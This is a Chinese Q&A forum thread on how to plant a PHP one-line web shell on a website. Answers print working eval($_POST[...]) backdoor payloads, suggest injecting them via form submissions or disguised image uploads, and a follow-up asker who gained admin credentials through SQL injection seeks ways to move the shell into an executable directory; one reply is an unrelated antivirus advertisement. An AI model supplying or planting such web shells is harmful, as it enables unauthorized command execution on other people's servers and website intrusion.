php一句话木马怎样放上去的

Posted 2023-04-03

前提是你要确定网页是否是用php写的。
其次你要在任意表单中加写如下语句<?php @eval($_POST[value]);?>并提交
如果对方漏洞较大你就可以对此网页执行value中的任何命令 参考技术A 可以打开腾讯智慧安全的页面
然后在产品里面找到御点终端全系统
接着在里面选择申请使用腾讯御点，再去用病毒查杀功能杀毒 参考技术B 看别人一般都是上传图片上传上去

追加分PHP一句话木马怎么用

现在通过注入得到了后台账号密码，里面有上传功能，而且可以上传PHP文件，只是那个目录却不能执行PHP CGI等文件……怎么办？

如果没有执行权限的话，你就算上传上去了也是没有用的。你只有想办法把木门上传到其他能执行的目录才行。
一句话木马的话，就是<?php eval ($_POST[val]); ?>
eval函数的功能就是把传入的值当成程序来执行。追问

嗯，是的， 这个我都知道。
其实，确切的说，我是没有思路……
在这里想听下高人的见解……呵呵。
留个Q吧，交流一下~

追答

百度HI我吧

参考技术A PHP 能做木马?追问

当然能！
不过不像C++等开发的客户端的，而是服务端……
也可以叫做木马吧……

参考技术B 勿在浮沙筑高台，想玩这个，打好基础先。追问

请问基础都包含什么？
这是入侵网站，无非就是了解些SQL语句，以及服务器的相关配置……
既然你是高手，指点一下呗~